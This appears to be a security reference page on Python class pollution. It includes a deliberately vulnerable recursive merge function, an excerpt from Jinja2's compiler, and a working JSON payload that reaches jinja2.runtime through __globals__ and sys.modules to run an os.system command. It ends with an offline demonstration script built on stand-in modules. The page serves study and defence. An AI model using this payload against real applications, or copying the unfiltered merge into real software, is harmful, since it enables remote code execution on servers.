Class Pollution

Definition

Class pollution is the Python counterpart of JavaScript prototype pollution. When attacker-controlled keys are merged recursively into an object, special attributes such as __class__, __init__ and __globals__ let the attacker walk from the instance to its class, from a method to the globals of its module, and from there into other loaded modules, setting arbitrary attributes and class variables along the way. Depending on the gadgets reachable from those objects, this can result in file access or even remote code execution.

Examples

The sink is any function that merges attacker-controlled data (typically parsed JSON) recursively into an object without filtering dunder keys: pydash's set_ and set_with functions, or a custom merge such as the one below. The dangerous branches are the last two: a key that is not a dict entry is resolved with getattr/setattr, so __class__, __init__ and __globals__ are followed like any other attribute.

def merge(source, destination):
    # Deliberately vulnerable recursive merge: `source` is attacker-controlled,
    # `destination` is the object being updated. No key is ever filtered.
    for key, value in source.items():
        if hasattr(destination, "get"):
            # dict-like destination: descend into an existing nested dict, else assign
            if destination.get(key) and type(value) == dict:
                merge(value, destination.get(key))
            else:
                destination[key] = value
        elif hasattr(destination, key) and type(value) == dict:
            # object destination with a matching attribute: descend into it
            # (this is the hop through __class__, __init__, __globals__, ...)
            merge(value, getattr(destination, key))
        else:
            # object destination: set the attribute, whatever the key is
            setattr(destination, key, value)

Gadgets

Jinja2

RCE

When Jinja2 compiles a template it generates Python source for it and then executes that source. The generator method below (CodeGenerator.visit_Template in jinja2/compiler.py) emits, near the top of every generated module, an import statement whose names are taken from the exported list in jinja2.runtime, imported fresh at compile time. Overwriting that list therefore places attacker-controlled text inside Python source that Jinja2 compiles and runs:

# jinja2/compiler.py, CodeGenerator.visit_Template (excerpt)
def visit_Template(
    self, node: nodes.Template, frame: t.Optional[Frame] = None
) -> None:
    assert frame is None, "no root frame allowed"
    eval_ctx = EvalContext(self.environment, self.name)

    # `exported` is read from the jinja2.runtime module attribute at compile
    # time, so a polluted value is picked up here
    from .runtime import exported, async_exported

    if self.environment.is_async:
        exported_names = sorted(exported + async_exported)
    else:
        exported_names = sorted(exported)

    # the list is joined verbatim into the generated Python source
    self.writeline("from jinja2.runtime import " + ", ".join(exported_names))

Payload (merged with the function above into an instance of a class that defines __init__ in Python; each nested key is one hop: the bound __init__ exposes __globals__, the module's __loader__ is an importlib loader whose own __init__ globals contain sys, and sys.modules leads to jinja2.runtime, where exported is replaced by a one-element list):

{"__init__":{"__globals__":{"__loader__": {"__init__":{"__globals__":{"sys":{"modules": {"jinja2":{"runtime":{"exported":["*;__import__('os').system('sleep 7');#"]}}}}}}}}}}

Because the list entry starts with * and contains a semicolon, the line written by visit_Template becomes from jinja2.runtime import *;__import__('os').system('sleep 7');# and the injected call runs as soon as Jinja2 compiles the next template. The trailing # comments out anything that might follow on the line. The sleep is only a blind confirmation that the command executed; any other command works the same way.
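The following added example, which is not code from the page, from pydash or from Jinja2, demonstrates both the basic pollution through the merge function in the Examples section and the compile-time gadget chain of this section, end to end and offline. It runs the page's own merge over a constructed User class to flip a class attribute and a module global, then reaches sys.modules in two hops because the module imports sys itself (the page's payload adds the __loader__.__init__.__globals__ hops to borrow sys from importlib's namespace when the victim module has not imported it). jinja2.runtime is replaced by a constructed fake_jinja2.runtime module and visit_Template by compile_template_header, which builds and executes the same import line, so the injected statement sets a flag instead of running a shell command. User, SECRET_FLAG, fake_jinja2 and the function names are assumptions made for the example.

```python
import sys
import types

SECRET_FLAG = "original"  # constructed module global that the payload overwrites


# The vulnerable recursive merge from the page (the sink), reproduced unchanged.
def merge(source, destination):
    for key, value in source.items():
        if hasattr(destination, "get"):
            if destination.get(key) and type(value) == dict:
                merge(value, destination.get(key))
            else:
                destination[key] = value
        elif hasattr(destination, key) and type(value) == dict:
            merge(value, getattr(destination, key))
        else:
            setattr(destination, key, value)


class User:
    """Constructed victim class; its Python-level __init__ exposes __globals__."""
    is_admin = False

    def __init__(self, name):
        self.name = name


def read_flag():
    return SECRET_FLAG


# Constructed stand-in for jinja2.runtime, registered in sys.modules so the
# payload walks sys.modules exactly as it would for the real package.
fake_runtime = types.ModuleType("fake_jinja2.runtime")
fake_runtime.exported = ["Markup"]   # names the compiler imports into generated code
fake_runtime.Markup = str            # placeholder so the clean import resolves
fake_jinja2 = types.ModuleType("fake_jinja2")
fake_jinja2.runtime = fake_runtime
fake_jinja2.pwned = False            # flag the injected statement will set
sys.modules["fake_jinja2"] = fake_jinja2
sys.modules["fake_jinja2.runtime"] = fake_runtime


def compile_template_header():
    """Stand-in for visit_Template: read `exported` at compile time, build the
    import line and exec it the way Jinja2 executes generated template source."""
    runtime = sys.modules["fake_jinja2"].runtime
    line = "from fake_jinja2.runtime import " + ", ".join(sorted(runtime.exported))
    exec(line, {})  # generated source is executed in a fresh namespace
    return line


def pollute_class_attribute():
    """Hop 1: instance -> __class__ -> class attribute shared by every instance."""
    merge({"__class__": {"is_admin": True}}, User("alice"))
    return User("bob").is_admin  # a brand-new instance now inherits the polluted value


def pollute_module_global():
    """Hops 1-2: instance -> __init__ (bound method) -> __globals__ (module dict)."""
    merge({"__init__": {"__globals__": {"SECRET_FLAG": "polluted"}}}, User("alice"))
    return read_flag()


def pollute_jinja_style_gadget():
    """Hops 1-6: instance -> __init__ -> __globals__ -> sys -> modules
    -> fake_jinja2 -> runtime -> exported. The single list entry closes the
    import statement with `*;` and appends its own statement, as the page's
    payload does with __import__('os').system(...)."""
    before = compile_template_header()
    payload = {"__init__": {"__globals__": {"sys": {"modules": {"fake_jinja2": {
        "runtime": {"exported": ["*;__import__('sys').modules['fake_jinja2'].pwned = True;#"]}}}}}}}
    merge(payload, User("alice"))
    after = compile_template_header()  # the polluted list is now joined into source
    return before, after, fake_jinja2.pwned


if __name__ == "__main__":
    print("class attribute polluted:", pollute_class_attribute())
    print("module global polluted:", pollute_module_global())
    before, after, hit = pollute_jinja_style_gadget()
    print("clean import line:   ", before)
    print("polluted import line:", after)
    print("injected statement ran:", hit)
```

The same walk works against any object whose class has a Python-level __init__, which is why the payload does not need to know anything about the victim class; a class that inherits object.__init__ unchanged stops the chain at the first hop, because the method-wrapper has no __globals__ and setattr on it raises.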
